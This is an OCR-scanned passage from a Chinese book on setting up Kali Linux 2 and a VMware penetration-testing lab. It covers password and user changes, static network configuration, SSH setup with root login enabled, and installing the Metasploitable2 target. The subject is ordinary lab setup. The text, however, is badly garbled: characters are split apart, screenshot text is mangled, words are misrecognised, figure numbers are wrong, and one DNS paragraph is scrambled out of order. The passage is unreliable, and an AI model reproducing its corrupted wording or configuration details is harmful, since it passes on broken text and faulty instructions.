2.3.1 修改 默认 用 户 

如 果 使 用 的 是 从 官网 下 载 的 Kali Linux 2 虚拟 机 映像 文件 ,那么 其 中 默认 的 密码 是 
“root ” 。 如 果 想 修改 这 个 密码 ， 可 以 使 用 命令 “passwd”+ 用 户 名 的 方式 ， 例 如 需要 修改 
root 用 户 密码 ， 就 可 以 使 用 “passwd root”， 过 程 如 图 2-40 所 示 


root@kali: ~ ° ee 
文件 (F) 编辑 (E) 查看 (V) 搜索 (S) 终端 () 帮助 (H) 


d root 


图 2-40 修改 root 用 户 密码 
再 次 登录 时 ， 需 要 使 用 新 的 密码 。 
虽然 很 多 程序 都 要 求 必须 只 有 root 权限 的 用 户 才能 运行 。 但 是 在 很 多 情况 下 ， 更 高 的 权 
限 也 意味 着 更 大 的 风险 。 如 果 以 root 用 户 的 身份 操作 失误 ， 可 能 会 对 正在 测试 的 系统 造成 破 
坏 。 所 以 在 很 多 时 候 以 非 root 用 户 的 身份 来 进行 测试 是 一 个 更 好 的 选择 。 
现在 创建 一 个 权限 较 低 的 账户 ， 创 建 用 户 的 命令 为 “adduser”。 打 开 一 个 终端 ， 然 后 在 
里 面 输入 命令 “adduser 11”， 执行 的 结果 如 图 2-41 所 示 。 
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root@kali: ~ °ee 
文件 (F) 编辑 (E) 查看 (V) ERS) 终端 T) 帮助 (H) 


图 2-41 添加 一 个 用 户 


这 里 需要 为 新 创建 的 用 户 设置 一 个 密码 ， 如 图 2-42 所 示 


车 键 以 使 用 默认 值 


: 2017 
1111111 


图 2-42 ”为 这 个 新 用 户 设置 一 个 密码 
到 此 一 个 新 的 普通 用 户 就 创建 好 了 ， 需 要 注意 这 


个 用 户 不 具备 root 权限 


23.2 ”对 Kali Linux 2 的 网 络 进行 配置 
想 要 使 用 Kali Linux 2 的 功能 ， 必 须 对 它 的 网 络 进行 正确 的 配置 。 查 看 当前 主机 的 网 络 
配置 情况 ， 具 体 的 操作 是 首先 打开 一 个 终端 ， 如 图 2-43 所 示 


Applications ~ Places ~ 


图 -rw 


g€ T> 
erminal 
Vulnerability Analy 


lication Analysis NN Fies 


图 2-43 启动 一 个 终端 
然后 在 打开 的 终端 中 输入 命令 “ ifconfig”"， 这 条 命令 可 以 用 来 查看 网 络 的 设置 情况 ， 显 
示 的 内 容 如 图 2-44 所 示 。 
这 里 面 因为 使 用 的 是 VMware 虚拟 机 ， VMware 已 经 自动 为 Kali Linux 2 设置 了 IP 地 址 、 
子 网 掩 码 和 网 关 。 但 是 如 果 使 用 的 Kali Linux 2 系统 并 不 是 安装 在 虚拟 机 中 ， 就 需要 手动 来 
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RUNNING, MULTICAST: 


图 2-44 使 用 这 onfig 查看 网 络 
例如 ， 需 要 为 这 个 系统 设置 的 要 求 如 下 
(1) 主机 卫 地 址 : 172.16.1.100 
(2) PRHE: 255.255.255.0 
(3) 默认 网 关 : 172.16.1.254 
(4) DNS 服务 器 : 211.81.200.9 
那么 就 可 以 在 命令 行 中 执行 如 下 命令 
rootekali: ~ # ifconfig eth0 172.16.1.100 netmask 255.255.255.0 


root@kali: ~ # route add default gw172.16.1.254 
root@kali: ~ # echo nameserver 211.81.200.9 > /etc/resolv.conf 


但 是 仅 这 样 设置 是 不 够 的 ， 如 果 重 启 系统 ，IP 地 址 和 路 由 的 所 有 设置 就 会 丢失 (不 过 
DNS 的 设置 仍然 还 在 )。 如 果 和 希望 这 个 设置 能 够 一 直 起 作用 ， 就 需要 将 这 些 设置 写 到 文件 中 
去 ， 这 个 文件 是 /etc/network/interfaces 文件 ， 打 开 之 后 如 图 2-45 所 示 。 


[orn al interfaces | s |=] e00 


/etc/network 


# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 


source /etc/network/interfaces.d/* 
# The loopback network interface 


auto lo 
liface lo inet loopback 


图 2-45 /etc/network/interfaces 文件 


在 打开 的 文件 下 方 添加 如 下 语句 。 


可 以 打开 DNS 配置 文件 来 修改 。 需 要 打开 另 一 个 “/etc/resovlconf ”文件 进行 配置 ， 


DN 
如 下 
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auto eth0 

iface eth0 inet static 
address 172.16.1.100 
netmask 255.255.255.0 
network 172.16.1.0 
broadcast 172.16.1.255 
gateway 172.16.1.254 


修改 完 的 完整 文件 如 图 2-46 所 示 。 


[on ~ [a] 二 


soo 


|# This file describes the network interfaces available on your system 
# and how to activate them. For more information, see interfaces(5). 


source /etc/network/interfaces.d/* 


## The loopback network interface 
auto lo 
i taea lo inet loopback 


thO 
Traean ethe inet ri 
address 172.16.1 
netmask 255.255. 255. Ü 
network 172.16.1.0 
broadcast 1172.16.1.255 
gateway 172.16.1.254| 


Plain Tet w Tab Width 8 w Inl5,cal2l 


图 2-46 ”修改 之 后 的 /etc/network/interfaces 文件 


< 
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Kali Linux 2 的 DNS 服务 器 地 址 不 在 这 个 文件 中 ， 可 以 使 用 前 面 的 echo 命令 来 修改 。 也 
这 个 文 
件 中 使 用 “ nameserver” 来 指定 DNS 服务 器 地 址 ， 最 多 可 以 指定 三 个 DNS， 只 有 当前 面 的 


所 示 。 


domain 
nameserver 10.10.10.10 
nameserver 102.54.16.2 


完成 了 上 面 的 设置 之 后 ， 执 行 命令 : 
root@kali ~ # /etc/init.d/networking restart 


新 的 网 络 设置 就 可 以 成 功 了 。 


S 服务 器 无 效 的 时 候 ， 后 面 的 DNS 才 会 起 作用 。 在 resolv.conf 中 指定 DNS 服务 器 的 格式 
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2.3.3 ”在 Kali Linux 2 中 安装 第 三 方程 序 


虽然 在 Kali Linux 2 中 已 经 预 装 了 超过 300 种 应 用 程序 ， 但 是 有 时 仍然 需要 安装 一 些 程 
序 来 保证 高 效 进行 渗透 测试 。 在 Kali Linux 2 中 安装 第 三 方 应 用 是 比较 简单 的 。 

这 里 同样 可 以 使 用 apt-get 命令 来 实现 软件 管理 ， 这 条 命令 主要 用 于 从 互联 网 的 软件 仓库 
中 搜索 、 安 装 、 升 级 、 务 载 软件 或 操作 系统 。 可 以 使 用 apt-get install 命令 在 Kali Linux 2 中 
安装 软件 。 例 如 ， 现 在 要 安装 apt-file 这 个 软件 ，apt-file 是 一 个 命令 行 界 面 的 APT 包 搜 索 工 
具 。 当 在 编译 源 代码 时 ， 时 有 缺少 文件 的 情况 发 生 。 此 时 ， 通 过 apt-file 就 可 以 找 出 该 缺失 文 
件 所 在 的 包 ， 然 后 将 缺失 的 包 安 装 后 即 可 让 编译 顺利 进行 。 安 装 的 命令 就 是 “ apt-get install 
apt-file”， 如 图 2-47 所 示 


E 


root@kali: ~ ° ee 


. Done 
ack: be installed 
libapt-pk rl libexporter- y-perl liblist-moreutils-perl 


libre ble-perl 
he following NEW packages will be i led 
apt-file apt-pkg per libexpo perl liblist-moreutils-perl 
libregexp-assembl 
upgraded, 5 n Aled, 0 to remove and 496 not upgraded. 
eed to get 28 f archives 
After this ope , 775 kB of additional disk s e will be used 


图 2-47 安装 apt-file 
安装 完成 之 后 ， 就 可 以 执行 这 个 软件 ， 如 图 2-48 所 示 。 


root@kali: ~ ° eo 
File Edit View Search Terminal Help 


图 2-48 执行 apt-file 


Kali Linux 2 中 的 菜单 里 的 选项 是 固定 的 ， 如 果 希 望 对 其 进行 调整 ， 可 以 使 用 一 款 名 
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alacarte 的 程序 ，Kali Linux 2 并 没有 安装 这 款 程序 。 可 以 使 用 刚 讲 过 的 方法 来 下 载 并 安装 这 
个 程序 ， 输 入 命令 “apt-get install alacarte”， 执 行 的 结果 如 图 2-49 所 示 。 


root@kali: ~ 89e 


Help 


File Edit View Search Terminal 


additional disk space w e used 
n/kali kali-rolling/mair alacarte all 3.1 


图 2-49 安装 alacarte 


安装 完成 之 后 ， 在 终端 中 输入 如 下 命令 
root@kali ~ # alacarte 


alacarte 是 一 款 图 形 化 操作 的 软件 ， 启 动 以 后 的 操作 界面 如 图 2-50 所 示 


Main Menu ooo 


Show Item Montimi | 
Information Gat| ZJ ® 01- Information Gathering = 
» “ha 92 - Vulnerability An b 02 - Vulnerability Analysis 
» O 03 - Web Applicatior 03 - Web Application Analysis New Separator 
Is 04 - Database Asse: Ma 04 - Database Assessment 
» 05 - Password l 05 - Password Attacks 
» 06- Wireless Attaci 06 - Wireless Attacks Delete 
W o7 - Reverse Engine $ 07 - Reverse Engineering 
出 08 - Exploitation Tod i 08 - Exploitation Tools 
» 22 09- Sniffing & Spod 2 09 - Sniffing & Spoofing Move Up 
> Ë 10- Post Exploitatioi Ë. 10 - Post Exploitation 
» Wç 11- Forensics W 11- Forensics 
z 12- Reporting Tools| z 12- Reporting Tools 
Ë 13- Social Engineeri Æ 13 - Social Engineering Tools 
» YT 14- System Service TI 14- System Services 
» 困 Usual applications ËB Usual applications 


上 四 wne Wie 


| Newitem | 
Properties 


Move Down 


GAARA (G i E g t g (g Z g 


Restore System Configuration || Close | 
图 2-50 alacarte 的 操作 界面 
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alacarte 软件 的 操作 十 分 简单 ， 这 里 不 再 详细 介绍 。 
本 书 中 使 用 的 Kali Linux 2 是 在 虚拟 机 中 运行 的 。 有 时 候 ， 需要 在 虚拟 机 Kali Linux 2 系 
统 和 外 面 的 Windows 系统 中 共享 文件 ， 为 了 操作 方便 ， 可 以 安装 vmtools， 安 装 的 方法 如 下 。 


root@kali: ~ #apt-get update 
root@kali: ~ #apt-get install open-vm-tools-desktop fuse 


执行 的 过 程 如 图 2-51 所 示 。 


# apt-get 
/mirrors.neus oft u.cn/ka 
tp://mirro n, 


3 http://mirro edu. cn/kal 
kB] 
4 http://mirrors.neu /kal ali-rolling/contrib i386 Packages [102 


MB U 17 


vm-tools-desktop fuse 


Done 


图 2-51 安装 vmtools 
之 后 重新 启动 系统 ， 命 令 如 下 
root@kali: ~ #reboot 


重新 启动 之 后 ， 就 可 以 在 Kali 系统 和 外 面 的 Windows 系统 中 拖 动 共享 文件 了 


2.3.4 对 Kali Linux 2 网 络 进行 SSH 远程 控制 

有 时 候 可 能 需要 远程 控制 Kali Linux 2 系统 。 默 认 情况 下 ，Kali Linux 2 系统 并 没有 开始 
SSH 服务 ， 如 果 希 望 远 程 使 用 SSH 服务 连接 到 Kali Linux 2， 需 要 先 在 Kali Linux 2 中 进行 
如 下 设置 。 

首先 来 设置 用 于 连接 的 密 钥 ，Kali Linux 2 中 已 经 预先 配置 好 了 SSH 的 密 钥 。 但 是 在 使 
用 SSH 服务 的 时 候 ， 最 好 不 用 这 个 默认 的 密 钥 ， 而 是 自己 pdb 此 时 必须 停 用 
这 个 默认 的 密 钥 。 将 这 个 默认 的 密 钥 移 动 到 一 个 备份 文件 夹 中 ， 然 后 使 用 如 下 命令 创建 一 个 
新 的 密 钥 

dpkg-reconfigure openssh-server 

首先 打开 SSH 所 在 的 目录 ,命令 如 下 。 

root@kali: ~# cd /etc/ssh/ 

在 这 个 文件 夹 中 创建 一 个 备份 文件 夹 keys_backup， 用 来 保存 默认 的 密 钥 ， 如 图 2-52 
所 示 。 


root@kali:/etc/ssh# mkdirkeys backup 
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Fa D lell] 
Recent | 
| 
K... backup ecdsa_key ri 
D Documents 2: 
© Downloads a np 
月 Music aap aana rsa_key  rsekey.pub 
图 2-52 创建 好 的 备份 文件 夹 
然后 使 用 如 下 命令 将 默认 的 密 钥 移动 到 keys backup 文件 夹 中 。 
root@kali:/etc/ssh# mv ssh_host_* keys_backup 
然后 使 用 如 下 命令 重新 创建 一 个 新 的 密 钥 
root@kali:/etc/ssh# dpkg-reconfigure openssh-server 
这 几 条 命令 完整 的 执行 过 程 如 图 2-53 所 示 
root@kali: /etc/ssh ee 


Fie Edit View Search Terminal 
tc/ssh/ 
mkdir keys backup 
mv ssh host * keys backup 
dpkg-reconfigur 
Creating SSH2 RSA key; this may take some time 
2048 SHA256: hHDge6sDu4uGGktQraOyFcGY8+8AR3sze17W59uSeQw root@kali (RSA) 
Creating SSH2 ECDSA key; this may take some 
256 SHA256:n+olYszTwxjV0SKbAbgl F8rh 
Creating SSH2 ED25519 key; this some time 
256 SHA256:DGwPEb/HLlWnXahcYl0TqMj+G714/qNCXcILd6mN7m4 root@kali (ED25519) 
# 


Help 


i (ECDSA) 


图 2-33 对 密 钥 的 操作 


可 以 将 新 生成 的 密 钥 的 md5 值 与 之 前 默认 的 md5 值 相 比较 ， 如 图 2-54 所 示 。 


root@kali: /etc/ssh/keys_backup ° ee 


Search Terminal Help 


File Edit View 


pub 


图 2-54 将 两 个 密 钥 进行 比较 
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修改 sshd_config 文件 ， 该 文件 的 目录 位 于 /etc/ssh/sshd_config， 如 图 2-55 所 示 。 


To disable tunneled clear text passwords, change to no here! 
PasswordAuthentication yes 


#PernitEmotyPasswords noj 


Change to yes to enable challenge-response passwords (beware issues with 
some PAM modules and threads) 


hal lengeResponseAuthentication no 


Kerberos options 


KerberosGetAFSToken no 


图 2-55 修改 sshd config 文件 


将 #PasswordAuthentication yes 的 注释 去 掉 ， 然 后 将 PermitEmptyPasswords no 修改 为 
PermitRootLogin yes， 如 图 2-56 所 示 


EE (s= eloo o 


‘etc/ssh 

For this to work you will also need host keys in /etc/ssh/ssh known hosts 
HostbasedAuthentication no 

Change to yes if you don't trust ~/.ssh/known_hosts for 
HostbasedAuthentication 
IgnoreUserKnownHosts no 


Don't read the user's ~/.rhosts and ~/.shosts files 
IgnoreRhosts yes 


To disable tunneled clear text passwords, change to no here! 
PasswordAuthentication yes 


PermitRootLogin yes| 


图 2-56 ”修改 之 后 sshd config 文件 
接 下 来 ， 在 终端 中 启动 SSH 服务 ,使 用 的 命令 如 下 


root@kali: ~ # /etc/init.d/ssh start 


执行 的 结果 如 图 2-57 所 示 。 


/etc/init 


图 2-57 启动 SSH 服务 
如 果 想 查看 SSH 服务 运行 状态 ， 可 以 使 用 如 下 命令 ， 结 果 如 图 2-58 所 示 。 


root@kali: ~ #netstat -antp 


# ni 
Active Internet 
Proto Recv-Q Si 
PID/Program name 
tcp 


State 


LISTEN 


LISTEN 


图 2-58 查看 SSH 服务 运行 状态 
可 以 看 到 目前 SSH 服务 已 经 在 22 端口 上 运行 起 来 了 。 
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现在 在 另外 一 台 计算 机 上 使 用 SSH 服务 来 远程 控制 Kali Linux 2， 这 里 使 用 PuTTY 来 完 
成 远程 登录 ， 如 图 2-59 所 示 。 


M 
ÉR PuTTY Configuration = 
— S — .. —.. 
Category: 
| E Session Basic options for your PuTTY session 
Specfy the destination you want to connect to 
Wiwa Host Name (or IP address) Pot 
| 本 Name (or s) ge 
| Bel 192.168.169.130 2 
| Features Connection type: 
| = Widow Raw © Tehet © Rogn @SSH © Sejal 
I! osn Load, save or delete a stored session 
avour 
(j Translation Sevgi Seniora 
| Selection 
Colours ~= 
Defaut Setti 
Lasn z F 
| Data — 
Proxy 一 
| Tea [ Dsee J 
| Rogn 
| SSH 
| s Cose window on et 
Aways © Never @ Only on dean ea 
yji 
| aa] Open |[ G= | 
L d 


图 2-39 PuTTY 的 工作 界面 


PuTTY 的 使 用 很 简单 ， 只 需要 输入 目标 的 IP 地 址 和 要 使 用 的 端口 即 可 ， 如 图 2-60 所 示 


P root@kali: ~ cam 


图 2-60 远程 连接 到 Kali Linux 2 


23.5 Kali Linux 2 的 更 新 操作 
需要 经 常 对 Kali Linux 2 系统 进行 升级 操作 。 一 种 方法 是 使 用 APT， 另 一 种 方法 是 使 用 
APT 对 整个 Kali Linux 2 系统 进行 更 新 。APT 中 最 为 常用 的 几 个 升级 命令 如 下 所 示 。 
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(1 ) apt-get update : 使 用 这 条 命令 是 为 了 同步 /etc/apt/sources.list 中 列 出 的 源 的 索引 ， 
样 才能 获取 到 最 新 的 软件 包 。 

(2) apt-get upgrade : 这 条 命令 是 用 来 安装 etc/apt/sources.list 中 所 列 出 来 的 所 有 包 的 最 
新 版 本 。Kali Linux 2 中 所 有 软件 都 会 被 更 新 。 这 条 命令 并 不 会 改变 或 删除 那些 没有 更 新 操作 
的 软件 ， 但 是 也 不 会 安装 当前 系统 不 存在 的 软件 。 

(3 ) apt-get dist-upgrade : 会 将 软件 包 升级 到 最 新 版 本 ， 并 安装 新 引入 的 依赖 包 。 除 了 提 
供 upgrade 的 全 部 功能 外 ， 还 会 智能 处 理 新 版 本 的 依赖 关系 问题 。 

只 需要 执行 如 下 命令 就 可 以 完成 对 系统 的 更 新 。 


root@kali: ~ #apt-get update 
root@kali: ~ #apt-get upgrade 


这 个 更 新 的 过 程 十 分 漫长 ， 需 要 耐心 等 待 。 


2.4 VMware 的 高 级 操作 


在 进行 渗透 测试 的 学 习 时 ， 有 很 多 技术 不 能 直接 应 用 在 真实 世界 中 ， 因 为 这 些 技术 的 破 
坏 性 可 能 会 带 来 法 律 上 的 问题 。 如 果 拥 有 一 个 属于 自己 的 网 络 安全 渗透 实验 室 ， 将 会 是 一 个 
非常 理想 的 选择 。 将 现实 中 的 网 络 ， 在 实验 室 中 模拟 出 来 ， 这 样 就 可 以 更 好 地 研究 各 种 渗透 
测试 的 方法 ， 而 不 必 担 心 因此 引发 的 后 果 。 

不 过 假想 一 下 ， 即 使 是 模拟 一 个 只 有 5 台 计算 机 的 网 络 ， 那 么 也 需要 占用 不 小 的 空间 ， 
而 且 切 换 着 对 这 些 设备 进行 调试 也 十 分 麻烦 。 不 过 好 在 除了 使 用 真实 设备 之 外 ， 还 有 一 个 选 
择 ， 那 就 是 使 用 虚拟 机 。 使 用 VMware 虚拟 机 软件 可 以 在 一 台 计算 机 上 模拟 出 多 台 完 全 不 同 
的 计算 机 。 这 样 只 需要 一 台 计 算 机 就 可 以 建立 一 个 网 络 安 全 渗透 实验 室 。 当 然 这 台 计 算 机 的 
硬件 配置 要 越 高 越 好 ， 其 中 影响 最 大 的 硬件 就 是 内 存 ， 最 好 使 用 SGB 以 上 的 内 存 。 

在 2.2 节 介 绍 Kali Linux 2 的 安装 时 提 到 了 VMware 的 安装 方法 。 接 下 来 了 解 如 何 使 用 
VMware 来 建立 一 个 网 络 渗透 实验 室 。 


24.1 在 VMware 中 安装 其 他 操作 系统 


1. 安装 M etasploitabl@ 

Metasploitable2 是 一 个 专门 用 来 进行 渗透 测试 的 靶 机 。 这 个 靶 机 上 存在 着 大 量 的 漏洞 ， 
这 些 漏洞 正好 是 学 习 Kali Linux 2 最 好 的 练习 对 象 。 这 个 靶 机 的 安装 文件 是 一 个 VMware 虚 
拟 机 映像 ， 可 以 下 载 这 个 映像 后 使 用 ， 使 用 的 步骤 如 下 。 

第 一 步 : 从 https://sourceforge.net/projects/metasploitable/files/Metasploitable2/ 下 载 Metasploitable2 


映像 的 压缩 包 ， 并 将 其 保存 到 计算 机 中 。 
第 二 步 : 下 载 完 成 后 ， 将 metasploitable-linux-2.0.0.zip 文件 解压 缩 。 
第 三 步 : 启动 VMware， 然 后 在 菜单 栏 上 单 击 “文件 ”一 “打开 ”， 然 后 在 弹出 的 文件 选 
择 框 中 选中 刚 解 压缩 文件 夹 中 的 Metasploitable.vmx。 
第 四 步 : 现在 这 个 Metasploitable2 就 会 出 现在 左 侧 的 虚拟 系统 列表 中 了 。 单 击 可 以 打开 


这 个 系统 。 
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第 五 步 : 对 虚拟 机 的 设置 不 需要 更 改 ， 但 是 要 注意 的 是 ， 网 络 连接 处 要 选择 NAT， 如 


图 2-61 所 示 。 


€ CD/DVD (IDE) 


设备 i * su. 
mnr 268 已 连接 (C) 
mmes 4 aE 
图 硬盘 (5CSD) 4068 

Sinim Piati 


© 桥接 模式 (8): 直接 连接 物理 网 络 
口 复制 物理 网 络 连接 状态 (P) 
© NAT 模式 (N): 用 于 共享 主机 的 P 地 址 


O 公主 机 模式 (): 与 主机 共享 的 专用 网 络 
O 自 定义 (U): MERNEK 

[Vmneto (Sep 
© LAN BRW: 


LAN ERR(S)…| 


图 2-61 Metasploitable2 的 网 络 连 接 方式 


第 六 步 : 现在 Metasploitable2 就 可 以 正常 使 用 了 。 右 击 系统 名 称 ， 然 后 依次 选中 “ 电 
源 ” 一 “启动 客户 机 ”， 可 以 打开 这 个 虚拟 机 。 系 统 可 能 会 弹出 一 个 菜单 ， 选 择 I copied it 
即 可 。 

第 七 步 : 使 用 “msfadmin” 作 为 用 户 名 ,“msfadmin ”作为 密码 登录 这 个 系统 。 

第 八 步 : 成 功 登录 以 后 ，VMware 已 经 为 这 个 系统 分 配 了 IP 地 址 。 现 在 就 可 以 使 用 这 个 
系统 了 。 


2. 安装 W hdows 7 虚拟 机 

上 面 那个 充满 漏洞 的 靶 机 是 一 个 Linux 系统 ,但 是 在 平时 进行 渗透 测试 的 目标 都 是 以 
Windows 为 主 的 ， 所 以 还 应 该 搭建 一 个 Windows 操作 系统 作为 靶 机 。 这 里 有 两 个 选择 ， 如 
RA Windows 7 的 安装 盘 ， 那 么 可 以 在 虚拟 机 中 安装 这 个 系统 。 另 外 建议 读者 最 好 到 https:/ 
developer.microsoft.com/en-us/microsoft-edge/tools/vms/ 下 载 微软 提供 的 测试 映像 。 在 这 个 地 
址 中 ， 微 软 提 供 了 如 图 2-62 所 示 的 各 种 系统 的 虚拟 机 映像 ， 利 用 这 些 映像 ， 渗 透 测 试 者 可 以 
极为 方便 地 对 各 种 系统 和 浏览 器 进行 测试 。 

下 载 其 中 的 IE8 on Win7 (x86) 作为 靶 机 ， 使 用 的 方法 和 之 前 的 一 样 ， 这 里 不 再 进行 


介绍 。 


BQ... | 
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Download virtual machines 


Test Microsoft Edge and versions of IE8 through IE11 using free virtual 
machines you download and manage locally. 
Select a download 


[Virtual machine 


IE8 on Win7 (x86) v 


Select one 


IE9 on Win7 (x86) 

IE10 on Win7 (x86) 

IE11 on Win7 (x86) 

IE11 on Win81 (x86) 

Microsoft Edge on Win10 (x64) Stable (15.15063) 
Microsoft Edge on Win10 (x64) Preview (16.16232) 


图 2-62 微软 提供 的 操作 系统 映像 列表 


2.4.2 VMware 中 的 网 络 连 接 


可 以 按照 自己 的 想法 在 VMware 中 建立 任意 的 网 络 拓扑 。 在 之 前 的 章节 中 已 经 提 到 
过 NAT 的 概念 ， 实 际 上 VMware 中 使 用 了 一 个 名 为 VMnet 的 概念 ， 在 VMware 中 每 一 个 
VMnet 就 相当 于 一 个 交换 机 ， 连 接 到 了 同一 个 VMnet 下 的 设备 就 都 同 处 于 一 个 子 网 内 ， 可 
以 在 菜单 栏 单 击 “ 编 辑 ” 一 “虚拟 网 络 编辑 器 ”来 查看 VMnet 的 设置 ， 如 图 2-63 所 示 。 


ik REN... : 已 连接 已 启用 192.168.80.0 
VMneta NAT 模式 NAT 模 式 已 连接 已 启用 192.168.169.0 


EWRO.. | BRO 


VMnet 信息 
O 桥接 模式 (将 虚拟 机 直接 连接 到 外 部 网 络 )E) 
桥接 到 (D: [自动 ~) [ Samo... 
O NAT 模式 (与 虚拟 机 共享 主机 的 玉 地 直 )QD [mriko ) 
O 仅 主机 模式 (在 专用 网 络 内 连接 虚拟 机 
口 将 主机 虚拟 适 配器 连接 到 此 网 络 Q) 
主机 虚拟 适配器 名 称 : VMware 网 络 适 配器 Vneto 
口 使 用 本 地 DHCP 服务 将 p 地 址 分 配给 虚拟 机 名 ) [oo SE... 
+P (D: RE FREM: 
Eoo CEE Ea | sme | [—ma) 


图 2-63 VMware 中 的 虚拟 网 络 编辑 器 
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这 里 面具 有 VMnet0、VMnetl 、VMnet8 这 三 个 子 网 ， 当 然 还 可 以 添加 更 多 的 网 络 ， 这 
三 个 子 网 分 别 对 应 着 VMware 虚拟 机 软件 中 提供 的 三 种 进行 设备 互 连 的 方式 ， 分 别 是 桥接 、 
NAT 、 仅 主机 模式 。 这 些 连 接 方式 与 VMware 中 的 虚拟 网 卡 是 相互 对 应 的 。 

(1) VMnet0: 这 是 VMware 用 于 虚拟 桥接 网 络 下 的 虚拟 交换 机 。 

(2) VMnetl: 这 是 VMware 用 于 虚拟 仅 主机 模式 网 络 下 的 虚拟 交换 机 。 

(3) VMnet8: 这 是 VMware 用 于 虚拟 NAT 网 络 下 的 虚拟 交换 机 。 

另外 ， 当 安装 完 VMware 软件 之 后 ， 系 统 中 就 会 多 出 两 块 虚 拟 的 网 卡 ， 分 别 是 VMware 
Network Adapter VMnetl 和 VMware Network Adapter VMnet8， 如 图 2-64 所 示 。 


VMware Network Adapter VMware Network Adapter 
$ VMnetl $ VMnet8 
已 启用 已 启用 


图 2-64 多 出 的 两 块 虚拟 网 卡 


VMware Network Adapter VMnet1: 这 是 Host 用 于 与 Host-Only 虚拟 网 络 进行 通信 的 虚拟 
网 卡 。 

VMware Network Adapter VMnet8 : 这 是 Host 用 于 与 NAT 虚拟 网 络 进行 通信 的 虚拟 网 卡 。 

接 下 来 看 一 下 这 三 种 连接 方式 的 不 同 之 处 。 

(1) NAT 网 络 。 这 是 VMware 中 最 为 常用 的 一 种 联网 模式 ， 这 种 连接 方式 使 用 的 是 
VMnet8 虚拟 交换 机 。 同 处 于 NAT 网 络 模式 下 的 系统 通过 VMnet8 交换 机 进行 通信 。NAT 网 
络 模式 下 的 IP 地 址 、 子 网 掩 码 、 网 关 和 DNS 服务 器 都 是 通过 DHCP 分 配 的 。 而 该 模式 下 的 
系统 在 与 外 部 通信 的 时 候 使 用 的 是 虚拟 的 NAT 服务 器 。 

(2 ) 桥接 网 络 。 这 种 模式 很 容易 理解 ， 凡 是 选择 使 用 桥接 网 络 的 系统 就 好 像 是 局 域 网 中 
的 一 个 独立 的 主机 ， 就 是 和 真实 的 计算 机 一 模 一 样 的 主机 ， 并 且 它 也 连接 到 了 这 个 真实 的 网 
络 。 因 此 如 果 要 这 个 系统 联网 ， 就 需要 将 这 个 系统 和 外 面 的 真实 主机 采用 相同 的 设置 方法 。 

(3) 仅 主 机 模式 。 这 种 模式 和 NAT 模式 差不多 ， 同 处 于 这 种 联网 模式 下 的 主机 是 相互 
连通 的 , 但 是 默认 是 不 会 连接 到 外 部 网 络 的 ， 这 样 在 进行 网 络 实验 (尤其 是 蠕虫 病毒 ) 时 就 
不 会 担心 传播 到 外 部 。 

在 本 书 中 所 使 用 的 虚拟 机 都 采用 了 NAT 联网 模式 ， 这 样 既 可 以 保证 虚拟 系统 的 互联 ， 
也 能 保证 这 些 系 统 连 接 到 外 部 网 络 。 


2.4.3 VMware 中 的 快照 与 克隆 功能 


1. VM wae 的 快照 功能 
在 进行 渗透 测试 的 时 候 ， 经 常会 引起 系统 的 骨 演 。 如 果 每 一 次 系统 出演， 都 要 进行 系统 
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重 装 ， 那 么 这 个 工作 量 也 是 相当 大 的 。VMware 中 提供 了 一 个 系统 快照 的 功能 ， 这 个 快照 类 
似 于 平时 所 使 用 的 “系统 备份 ”功能 ， 这 个 功能 可 以 将 系统 当前 状态 记录 下 来 ， 如 果 需 要 ， 
可 以 随时 恢复 到 快照 时 的 状态 。 通 常 在 对 Kali Linux 2 进行 升级 之 前 ， 或 者 对 目标 系统 进行 
渗透 之 前 ， 都 会 对 系统 进行 快照 。 当 升级 失败 或 者 渗透 导致 系统 不 可 正常 使 用 时 ， 再 恢复 
快照 。 

创建 快照 的 操作 很 简单 。 

第 一 步 : 启动 虚拟 机 ， 在 菜单 中 单 击 “ 虚 拟 机 "， 然 后 在 下 拉 菜 单 中 选中 “快照 ”选项 ， 
然后 单 击 “ 拍 摄 快 照 ”。 

第 二 步 : 在 “拍摄 快照 ”窗口 中 填 入 快照 的 名 字 和 注释 ， 单 击 “ 拍 摄 快照 ”。 

如 果 需 要 将 当前 的 虚拟 机 恢复 到 快照 时 的 状态 ， 同 样 要 在 菜单 中 单 击 “虚拟 机 ”一 “ 快 
照 "， 在 弹出 的 菜单 选中 要 恢复 的 快照 名 称 即 可 。 


2. VM wae 的 克隆 功能 

当 需 要 模拟 一 个 拥有 三 个 Windows 7 操作 系统 的 网 络 时 ， 无 须 一 个 个 安装 虚拟 机 ， 只 需 
要 在 创建 一 个 虚拟 机 之 后 ， 执 行 两 次 克隆 操作 即 可 。 

克隆 是 一 种 类 似 于 快照 的 操作 ， 但 是 两 者 又 有 着 明显 的 不 同 。 快 照 和 克隆 都 是 对 操作 
系统 某 一 时 刻 的 状态 进行 的 备份 。 但 是 快照 不 能 独立 运行 ， 必 须 在 原来 系统 的 基础 上 才能 运 
行 。 而 克隆 可 以 脱离 原来 系统 运行 ,一旦 克隆 完成 克隆 的 系统 与 原来 的 虚拟 机 是 相对 独立 
的 ， 可 以 看 作 是 两 个 互 不 相干 的 系统 。 而 且 VMware 在 克隆 的 时 候 ， 会 给 新 系统 一 个 MAC 
地 址 。 这 样 原来 的 系统 和 克隆 的 系统 就 可 以 同 处 于 一 个 网 络 而 不 会 发 生 冲 突 ， 创 建 一 个 克隆 
的 方法 如 下 。 

第 一 步 : 启动 虚拟 机 ， 在 菜单 中 单 击 “虚拟 机 "， 然 后 在 下 拉 菜 单 中 选中 “管理 ”选项 ， 
然后 单 击 “克隆 ”。 

第 二 步 : 在 虚拟 机 克隆 向 导 中 ， 系 统 会 要 求 选择 一 个 克隆 源 ， 这 个 克隆 源 可 以 是 虚拟 机 
的 当前 状态 ， 也 可 以 是 某 一 快照 的 状态 ,根据 实际 需求 做 出 选择 即 可 。 

第 三 步 : 克隆 方法 处 有 两 个 选项 “创建 链接 克隆 ”和 “创建 完整 克隆 ”。 链 接 克隆 产生 
的 文件 占用 硬盘 更 小 ， 但 是 必须 能 够 访问 原始 的 虚拟 机 时 才能 使 用 。 完 整 克隆 则 完全 独立 ， 
可 以 在 任何 地 方 使 用 , 但 是 占用 的 硬盘 空间 较 大 。 通 常 在 一 台 计 算 机 上 做 实验 ， 建 议 选择 链 
接 克 隆 。 

第 四 步 : 选择 保存 克隆 文件 的 地 址 ， 然 后 执行 到 完成 即 可 。 

第 五 步 : 操作 结束 之 后 ， 在 虚拟 机 左 侧 的 操作 系统 列表 处 就 会 出 现 一 个 新 的 克隆 操作 系统 。 


3. VM wae 导 出 虚拟 机 
